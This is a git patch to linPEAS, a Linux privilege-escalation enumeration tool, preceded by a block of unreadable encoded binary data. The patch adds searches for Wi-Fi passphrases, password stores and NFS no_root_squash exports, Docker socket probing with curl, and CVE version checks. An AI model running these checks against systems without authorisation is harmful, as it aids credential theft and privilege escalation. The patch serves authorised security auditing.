zsu$fH`?Z3W=_H$x1DZn*YL4B=A@$O4b&h4^u+H%}azuRtj2u5o6>BO{Qlxi~gwVW86l5(yBH_&go-%USr!DxuCI~ zjQp(I=r4MJUes&!l8*0e-+SIE}>U-Nvx4;x|;r`8|d$Pi~gYx>7VM; z#YlyQ((Brk-q7eS#w|BBy1S7|jqY#cmPQXSa$DQeJGzKg=?eOnt{7_MuCAr`w2W5k z8G2uXh8g)=Gw1`|O8?Qj^r6~ZM*h{>^pW(sM~?<96s2dZbY#- zlP4XEvyAv+6|IHOX>Dw$bx=l~I7uyBrUnhB8mWun)DJn-A6^=OJ+vN5bBzR|oYqGr z4T9e^Bf;>?Hxhz(Xs8=-8)<-gGz<%9IL^_AI9Fh#5$@3^V4q>6F}l(S45X3Br%iB* zM&S%?iZe5fJc*!LMxH`0ZH8s^X{@Eqv57u|UG!PprqKwPZKMUV3!E0_fqUh`B zM@PU#N5WNNWE2wVXk^iNxakxET zKQUo)%Ge3xk`ptQr%qXwy*7JwcDL?5diLUjvgrS}rRIIvShJ5PiVU_F=XruhhEMg@ V9UcBa?Rz_V1IC3{+KO8F{s+cI;kW<* delta 1648 zcmXZdc~Dh#7{>AUUU(nWdtU@Z5U&eZrsf8@5bn7rD!3qpd!VF%xNo5sy%jdrAa0bS zHV#asLoQiet;}6BO{GOLwKPjJHA5{Fw;pFYGvCj9&Yb_wd1rq4$8z$I)&z#dIiz^Q zE?0x%J-b}$k6GvH5a^%1!IeesB>ZrP!8=uY*~&(wF{EuU)%{X$C~ zxMi1KreA93hi=)eS#*z9(7hV}$SwPH7~QX9y&MNLiyqXg^pIB3!&)UKUunF<dA&@-_nr}Q$d z&|CCJZ5ih^Iju9=nf#<)dPaBCv%0&p$vN%V#pGx0OMlUc^t@i87xX6mRUgueTC1zc zZyG^=*NAQ=m$V7JtgYxDI+b40Jo=};O0VkM^qQ8^>sr>$yz-Zp^)$JmWdlt9*0MyC zO5H(kYWP5tTiTG`)`r7P{?VrNU+qJyG=<*LRrIb_(rWFHVscMs(fhiHKF~MlLp?$t z>1#PAf+FfbId$S3^#&keib)_6a!nLC-|5X8?h2}O4rhF)_`>L8tlBbU}iA&o#`o=GIIz@(lRuX99UIjxVdg(e=P z(FRE4uW5+cv=J85#@I)rah%5BA#H-8`6f>wg+7UtMJ7$Liav$Av>Bonn>0sL+5&O( zX>_G6F^#rD5p50c297qkLfgW8Cb5X3acD}PK^$#|3A8;bX$Mp;HR*^4G#>J%$+K|N z1T>(X(42P0650iKXjcTjWzr2Hv^yHm9%x0MLpJS+wO)>1IJ?ZGH^vp2^g%Z5i;J`$ zZqWX?N1sQ~a+3k*M-vgW!ek(VR+JpxW` zOexr*_5C~4Qd8M-!Y|Q&GZ&P04z(IqPl10M* wKLsA21Z^JQM;FCJIHTtmuO980>yOUxe0j7{>88p|vcv&kFVb^bMD+P_rpC4znHl& zF?0En{N$JAXXM;e$@ z9}JD|b6IcgZLYqZi|*u`x!fiYAomF4!cIUfSjg1z&Z1>uc zuI$C*-Bsh=E_QZyU}-F!oyRg*N7jjTW?fh&JD+7SFlAlip>$= zqK&RZ!4F32QE z+UORfXdJ#YE3cuBzK#Ta118Hjyoc62D?8CfcOgZ0BQ4*``|!{YP(VL~kG3FmiItBKqaUM%?m=c>D|_Lg`(XN6 z`2-IA6am_b5d91xua*61qn}4m(%;G#2-7c-qF=!oVC8E#1Fa+wq~9P!zeS9Ghh};J zN%}qfg;owCKz~4Bkd-!6(?dwnAK@8n6c;itc#f*wHwO(GKG_!TL76y^#m z$Ka*M;n3d@pueM%{sE8AN(vsw%AY8pf5A&nz@dL5Ku;n_PobHfhWBbK?QrNB1n55q z(ti=6qA}{yM1;ewW|Wl<+DOy1iKeS}w3YMJp&1&W9W_WhX#?%7!7*04Xwc7}iMG)5 zwIyIBOOq7ZPF2I>taQ~1+D$z-S?R7t)T1r5hqlt5+ICaKO18F5w9-q{Zne@|y|j-y zG)JA=tr!hZt3i5!hUkS_L36d4=4m_4*UUStT%-Y7pe^)bP0&j;N&9L^v6X(>Krht< zy-btza!pRL5%FqrhL!&6lvx>|6?C9h(n3wpL7Jq4wVhs}-f}BGt)N$GI~}6_u$8N{ zhz`{R9i~Y-T)i``jL;-?)H}<{)#}h|)R}GNT6H2;Mrv#kzvU=x<`}K5i>fAU=*GG; z59`5tvTW8XK4C-eA$gkKw*Taz$httyum!!BIXjB0R_y5=U$Li;&P%Hs?2_n=sW~RT z`}&;WY1xzRDxGw9`S9HQ>7~Wx<@3i}H+Ia8w=BqypB$Gn`b7E-rQz`0=;lQ^cl4Zk z_O^dnX>sVD0n^K-O)o7APbn>rZeEvjef0P+bJ-JXax$WO{pR-Qwk{?sK4Pq?x-z7{~FarITCP?_nDZ*!#*h2PhO6IFQSfF^P$BD3EEQnSx{?hBV5hc)?;P zOb0lSx#|EXAWl&z1GQ4ngQ6Bht)em&wQ^BZE>#ex44mSRs3-Y;o^#&hBq!&Orz$zG z>cG4ei}Qz`3GR^puEUZqU0sDD)2&FSe-E2i)or{b{kBy`Zn}7|&PpV$E-%x&%ZiuJ zyH*+*)iAk(_0`|%8qlR>8sE(2`Skjwu0gKK`faWOu9@`*UHR_itLokEe0T1Ih9hp9 zSzqGHUNp&FGs*2@7iS0NVQK6V){%8$omm&wm3dh=md?PGb&pMQXSg?nqWr|Wk)Zd$ zzuL$ww9wgTSz}}lJZp{2g_j19Mdu+*??u*nBln?z-j5>s0E#vmnU8Y%Aj&rx38IlM zKr4L+1rZ}5glQF8>BGp{Y-Aw{LL7@wM5_^{k04GTMZDQa4LnktIkvMwX&t zr;*1{vD-*38tF1b=yIg!ktY$SPoaf2zrC%Z7v+^|@`VE}HR+324Z;_%0;TvM*5Q^zx z_~{YE>32xb?~xd4*?`WcbAVSZ=p>0Ueb4b$jC?0F&Pef=t9Qqd$^lv2T z1*E8`uh@!9D?%J@Z5(H%gBFxn@n{iE(+Isp9okV7w38-jXEo!kbkQX3s>xC=6D_;e zN;fUL!AiRNDKtn`TWNP~rx_Y9vy!PTG)v1STIr$Xw5L{13|Yz6%A2k9(rVgUBeah? zG)JA=tr$&Et4VsPrf6Snr@2~uhm|}H(tNF@muZ3)XxUUN{j`GiS3ez~N9pBirdhc{ zE9gM=(?ROL%Z9|K{#jNAt3!uqI~}T?*;Wd*f(}zZ9j-xorABCxw$l+BoMUCA#_3hs zLPu%ETq~p1PseD4j#YoaO0h=h)#}h|)R|{xoH`4vl&G(Y|8l$*bCha%Rn3&<43^2V zSP#~dWwTzfDb2k{=IOEv``0H+my|52ntCqlPK0Y#?&}>}xv!7T_hbxnNkiSt9247n zea;w9EdR!w(Pv{juQN3x8cKsEqjMWqe%pK_(l9x0vKsgNO7{&3YrDZ4QVQYchTMKFdg|JCwt*jkHiR0+hZxsg1h)XG5B5T5;Eh+{| zF;SKRqM!l=MH8!1!KL69P%((h3!)TdiGW%*jUL{a|L@#ycjo?)#4hra86l^mx4?a2{zU@X9pn)z##ttKXyU`Z7G{jJ$$8x&>ak6(Ra6w$Rs5M_)%H-G(^b4(FT+ z$PPFcjMTxoVq_pQ6NYbC+8eqkNmmWhQJ&qv#8BO#A67&}&23q+QoL1igryAy)oGg#Lxd zNGpG%kv1bnFTtUgk)T(Qq*qZm%E~pw=s$4izevy|lJq~gMq3f}(iHUvIH}q&#!3s# zA8RE|3uwB=XiIfyD^1YWnxt(sZ=993nxySCIo?WpEuLVdgBIUy#ic=8< zEZRvUw6iwTE?Vrh(p7ylLo2-jE16nZV5OUGq1`n`d#FR*>J(ZrnxIybG)r9%TDd{9 zXtoy8o?1(LX&t>$6Z9r6o@(W0_0t>;(%#x~nw379NBgRu-l9Qzs|IJ zD788X&d%DF9ia$=M+$=vXw=NY=&j9gQyw3Fn4}(;binCvNZxif+7?V zVxigsY7mzqTNH%`6)PTB37*9f8@i?N`FMT|aP_|5!(&&9brGv8TqxMs=Wnz|Lm zt9J}rwr17#l0EB;jBPyUwiD|YxO%&zGwav7Ru=W2=Bl6K8oYG6yLP(U#s1qOR?JG6 zhjm~bStr(+bzxmuH|Awv%DShgyGz}h2icqMrzSSS0J{>$fJnuHL?-~`WOoPjjTf8fRWV*(gYIpainM+ zGIR~Rtwz=&LF>^#pFk*UTUSr5-KBO6dnpF;I1BTu7+K7$NR zB1bnOa@xqVh|x_*(C3h(&m%=&K zvI9=LkrbSZMqY+<$;c~+(4EN8SCOT!A?vcT3n%Dqc-&T+;iGAU=pHoF*HNHvAW&rG zO$6y)gy>snpe+cMTX`E{x(`kC9W>MUyYLw+@4;uS>_@)B$^qp2S!so*zm@mlqaUD> zeh5GP2-Wmsgy=ye23q+98Ja%I9$C7l_cqNYF2l7-FRjo}pHb z#Ic<76&mQ*@C~!_4IKI{oZ(i!LyUfp1kEBte?XQVg}2JeF@))lh|uGRjIi<(QuJr| zMp`)mKRt|k8xdMSjQ)cJ70pnW7UCSY1}0f4(pFlm zZL~y#ldX8vp&c|rJ8Fz}(iYlTV^gej(b!ZgT{TC$X>NuUuX=B>08+kSt@P1K+E;_LOdVRT&RtfFMyS;ot=s?ZUL0X`d>b={_HM*Q$t1Wb}7U&T5&a^UAz4zL<3{&qcE5p^HRhpzD zw26+?0v)B^*;Ynt1-(v#^m3$9l6q=^3fM{sG$Y_X5P1hYN(}l&Qqg>Ls^Nw+Fj5LV1e*ibf%4QC_R0j!jPDI1v#xXauRMEu=GE<=D`jvNi4ZoQEusEZqE zKpSmDJ8eQ2ZH8xqk)`Om$H+4D&@lSxa`bOBvH}^p5}8d#R>AwQk<|#(E6_tD@bnsq zB1~J*MXy9pgkuf*=~eJQV&rPn(rZwgFw%-P+J@j}BiACh#mIHY((94kYUBoZw;8z+ zK6(>E^k%fvb|h#Aa`YC2wj1e0nBEG1*2rzBrE5_~V`$GtjC3LMg^}AaK-ZyWmyvGN zd}m}m;`9zA=$%N@yAb%^NE|`B0U>%fqVyiL(|ghWgOU3Xr}ra4A3&b=pk$Ac2ch&K z)X8EL9BOF_ZS;9`(Z~zPbG(TBK~`Qu#%tweWGby} z#Q@!gJl&3xDl4zRLtjM=eGPv4IzoqAc>@XhCem~VwAxA<9{Lu%HCEn+L*GGwzKalj z525i^-p2s_AcBPxtYi?TA0kgbf-}*|$8e6e@(F_UQ-tVFBI(JXTGbJY5*e1QPn zg}@{$U!t9Ug*^Qlp2=2rqlON^PrpGe{T5OB9pdzRL=qf7AW!$edyJJI;iEY?^d|)9 zUbNAl;hAFP7kFk_`4u(vH~8p2I5dv{{T)HNA1V3=e8*Y&6At|g0s1$B^dE$%Xo9*l z8{u%P_e3iN+CvMqpBAZawv{33&|(eH5)IO!8mGfFILFFx4W7h5iKgiRnm*M^spcqD zPP3vKrXw{<%hYqal~Gzp57aartr=Rb1E)ueUpjR0&$CQl*DzfF7!8dYESE;hLk>x^TXg8jaHgO-MbYiIC z@=$$4)5Z0TvA&HJ^J2N_=E${oR}{z6Cz;-h0!5l?jYe+v5!`m ztICFS8}1$d9p1rnZ%1W0caCJ+N^{LXEO&v8CQBFC{YCC6Gm|41*&kgUzT$rYI927P delta 1652 zcmXxkd2Ew)9LMo*y8-3=d>L0^zn^rIW84J=$0Y-eViashG}A<^#F&K`EtggtwhFR| z*T&QpRH%3`u2B(bQP9T&tS9xZicmbqq12OtqJD__OWv>V^ZfEW$&=@gUv&SXXm(LU zeR-|7;K+X~CvI0~mtSO#74iJLxouVB#w)wcUS;I+GaGR$o7**(_2}YQ>B4&_W~8$D zx*|Kg=_=RYPT3&e^l^Vq(+bxx*Y!<1T!US6n+~|j-78l$x!vVOz6)Jv9v`wa;I0d} zUF^&(V#TZ-YtK3`59`P}vCgau>&m(@FlF770e6XeeI&*2y9pV3GeWD4gpj54kX>VB zK0IrUEP&F5@X|$y(OckMXXI8?&@d|LZK&L6WHGAg?Wo>lq!w|y1O<8rDmEL5AV#Ao z&^zJXV&pDVL^zhBk}gAv-ic_XcG3P!fVIcX$;41E^mDf?--^w0T`>gCm4SfS) znnpc+6EXT0TIkzI(RYv^VC7x-2U>X#0lE(jG=ms@AMrs}K7d0%M23EZJpCB?p;kUY z%`hvUM$pEQMS*^X@Ng@i!=Ycm8DV8Va`a2&=>hmhS~-X+nnQ>lLYjVs4E-9JQC7Zz z`mKD6F#QfO`aN1`8&dQz()0*qw3Vaq(PN1CIetKx{)jj|js(rap+6x*e}-p_m0u8} zzalol%5P|)zav3Uz@Y_X=t<=0DO63g@&^+1PdM~6GW0Lx=-E)7OF+!~)^ zrARBPtQ2b{ZKny^ULD#&Gt{Fw+EIN|t#r~H?X0 zmCLM@XpHvIEbXa*8CH5}HSMi6Ga^>{Xw4N?yjoBDYJ&DthnA{yjTNIAYBfjC(md_2 zGTVwzt7w@*+pp_vSq(e1ChiRzBMr62#LRLno zLr1F2vocCO)UQE0T0?YTV-sG&-zT?Vt^68`g zozvG}yg5{1JI-v}P#4?RHyPX4PZt-LjCM(L Date: Sun, 19 Dec 2021 08:31:53 -0500 Subject: [PATCH 5/5] more_checks --- build_lists/sensitive_files.yaml | 117 ++++++++++--- .../linpeas_parts/available_software.sh | 26 +-- linPEAS/builder/linpeas_parts/container.sh | 128 +++++++++++++- .../linpeas_parts/interesting_files.sh | 50 +++--- linPEAS/builder/linpeas_parts/linpeas_base.sh | 161 ++---------------- .../linpeas_parts/network_information.sh | 58 ++++--- .../procs_crons_timers_srvcs_sockets.sh | 16 +- .../linpeas_parts/software_information.sh | 72 ++++---- .../linpeas_parts/system_information.sh | 21 ++- .../linpeas_parts/users_information.sh | 27 +-- linPEAS/builder/src/fileRecord.py | 2 + linPEAS/builder/src/linpeasBuilder.py | 6 +- 12 files changed, 393 insertions(+), 291 deletions(-) diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index b751bef..c725659 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -113,6 +113,7 @@ variables: defaults: auto_check: False #The builder will generate a check for the file (only linpeas) bad_regex: "" #The regex used to color red. If only_bad_lines and no line_grep, then only lines containing this regex will be printed + very_bad_regex: "" #The regex used to color yellow/red check_extra_path: "" #Check if the found files are in a specific path (only linpeas) good_regex: "" #The regex to color green just_list_file: False #Just mention the path to the file, do not cat it @@ -543,11 +544,11 @@ search: files: - name: "mongod*.conf" value: - type: f - remove_empty_lines: True - remove_regex: '\W+\#|^#' - search_in: - - common + type: f + remove_empty_lines: True + remove_regex: '\W+\#|^#' + search_in: + - common - name: Supervisord @@ -558,11 +559,11 @@ search: files: - name: "supervisord.conf" value: - bad_regex: "port.*=|username.*=|password.*=" - only_bad_lines: True - type: f - search_in: - - common + bad_regex: "port.*=|username.*=|password.*=" + only_bad_lines: True + type: f + search_in: + - common - name: Cesi value: @@ -586,19 +587,19 @@ search: files: - name: "rsyncd.conf" value: - bad_regex: "secrets.*|auth.*users.*=" - type: f - remove_empty_lines: True - remove_regex: '\W+\#|^#' - search_in: - - common + bad_regex: "secrets.*|auth.*users.*=" + type: f + remove_empty_lines: True + remove_regex: '\W+\#|^#' + search_in: + - common - name: "rsyncd.secrets" value: - bad_regex: ".*" - type: f - search_in: - - common + bad_regex: ".*" + type: f + search_in: + - common - name: Hostapd value: @@ -608,12 +609,64 @@ search: files: - name: "hostapd.conf" value: - bad_regex: "passphrase.*" - remove_regex: '^#' - remove_empty_lines: True + bad_regex: "passphrase.*" + remove_regex: '^#' + remove_empty_lines: True + type: f + search_in: + - common + + - name: Wifi Connections + value: + config: + auto_check: True + + files: + - name: "system-connections" + value: + files: + - name: "*" + value: + bad_regex: "psk.*" + only_bad_lines: True + type: f + type: d + search_in: + - /etc + + - name: PAM Auth + value: + config: + auto_check: True + + files: + - name: "pam.d" + value: + files: + - name: "sshd" + value: + bad_regex: ".*" + line_grep: '-i "auth"' + remove_regex: "^#|^@" + type: f + type: d + search_in: + - /etc + + - name: NFS Exports + value: + config: + auto_check: True + + files: + - name: exports + value: + very_bad_regex: "no_root_squash|no_all_squash" + bad_regex: "insecure" + remove_regex: '\W+\#|^#' type: f search_in: - - common + - /etc - name: Anaconda ks value: @@ -629,7 +682,6 @@ search: search_in: - common - - name: Racoon value: config: @@ -1921,7 +1973,7 @@ search: auto_check: False files: - - name: ".*_history.*" + - name: '*_history*' value: bad_regex: "$pwd_inside_history" line_grep: '-a "$pwd_inside_history"' @@ -2136,6 +2188,19 @@ search: type: f search_in: - common + + - name: Pass Store Directories + value: + config: + auto_check: True + + files: + - name: ".password-store" + value: + just_list_file: True + type: d + search_in: + - common - name: FTP value: diff --git a/linPEAS/builder/linpeas_parts/available_software.sh b/linPEAS/builder/linpeas_parts/available_software.sh index 5c9ecd4..488b51a 100644 --- a/linPEAS/builder/linpeas_parts/available_software.sh +++ b/linPEAS/builder/linpeas_parts/available_software.sh @@ -4,11 +4,11 @@ #-- 1AS) Useful software print_2title "Useful software" -command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind echo "" #-- 2AS) Search for compilers -print_2title "Installed Compiler" +print_2title "Installed Compilers" (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" @@ -25,16 +25,16 @@ if [ "$(command -v brew 2>/dev/null)" ]; then fi if [ "$MACPEAS" ]; then -print_2title "Writable Installed Applications" -system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi -done + print_2title "Writable Installed Applications" + system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done -system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi -done + system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/container.sh b/linPEAS/builder/linpeas_parts/container.sh index c1af4cf..046ed0f 100644 --- a/linPEAS/builder/linpeas_parts/container.sh +++ b/linPEAS/builder/linpeas_parts/container.sh @@ -1,3 +1,129 @@ +########################################### +#---------) Container functions (---------# +########################################### + +containerCheck() { + inContainer="" + containerType="$(echo_no)" + + # Are we inside docker? + if [ -f "/.dockerenv" ] || + grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || + grep -qai docker /proc/self/cgroup 2>/dev/null || + [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then + + inContainer="1" + containerType="docker\n" + fi + + # Are we inside kubenetes? + if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || + grep -qai kubepods /proc/self/cgroup 2>/dev/null; then + + inContainer="1" + if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" + else containerType="kubernetes\n" + fi + fi + + # Are we inside LXC? + if env | grep "container=lxc" -qa 2>/dev/null || + grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then + + inContainer="1" + containerType="lxc\n" + fi + + # Are we inside podman? + if env | grep -qa "container=podman" 2>/dev/null || + grep -qa "container=podman" /proc/1/environ 2>/dev/null; then + + inContainer="1" + containerType="podman\n" + fi + + # Check for other container platforms that report themselves in PID 1 env + if [ -z "$inContainer" ]; then + if grep -a 'container=' /proc/1/environ 2>/dev/null; then + inContainer="1" + containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" + fi + fi +} + +inDockerGroup() { + DOCKER_GROUP="No" + if groups 2>/dev/null | grep -q '\bdocker\b'; then + DOCKER_GROUP="Yes" + fi +} + +checkDockerRootless() { + DOCKER_ROOTLESS="No" + if docker info 2>/dev/null|grep -q rootless; then + DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" + fi +} + +enumerateDockerSockets() { + dockerVersion="$(echo_not_found)" + if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then + SEARCHED_DOCKER_SOCKETS="1" + for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then + echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" + echo "Docker enummeration:" + docker_enumerated="" + + if [ "$(command -v curl)" ]; then + sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) + echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi + fi + + if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then + sockInfoResponse="$(docker info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) + printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + fi + + else + echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" + fi + done + fi +} + +checkDockerVersionExploits() { + if echo "$dockerVersion" | grep -iq "not found"; then + VULN_CVE_2019_13139="$(echo_not_found)" + VULN_CVE_2019_5736="$(echo_not_found)" + return + fi + + VULN_CVE_2019_13139="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then + VULN_CVE_2019_13139="Yes" + fi + + VULN_CVE_2019_5736="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then + VULN_CVE_2019_5736="Yes" + fi +} + +checkContainerExploits() { + VULN_CVE_2019_5021="$(echo_no)" + if [ -f "/etc/alpine-release" ]; then + alpineVersion=$(cat /etc/alpine-release) + if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then + VULN_CVE_2019_5021="Yes" + fi + fi +} + + ############################################## #---------------) Containers (---------------# ############################################## @@ -57,7 +183,7 @@ if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" + print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" if echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi diff --git a/linPEAS/builder/linpeas_parts/interesting_files.sh b/linPEAS/builder/linpeas_parts/interesting_files.sh index d1bc7be..3f47954 100644 --- a/linPEAS/builder/linpeas_parts/interesting_files.sh +++ b/linPEAS/builder/linpeas_parts/interesting_files.sh @@ -2,6 +2,20 @@ #----------) Interesting files (----------# ########################################### +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + + + + + ##-- IF) SUID print_2title "SUID - Check easy privesc, exploits and write perms" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" @@ -255,33 +269,26 @@ echo "" ##-- IF) Files (scripts) in /etc/profile.d/ print_2title "Files (scripts) in /etc/profile.d/" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" -if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" fi echo "" ##-- IF) Files (scripts) in /etc/init.d/ print_2title "Permissions in init, init.d, systemd, and rc.d" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" -if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' 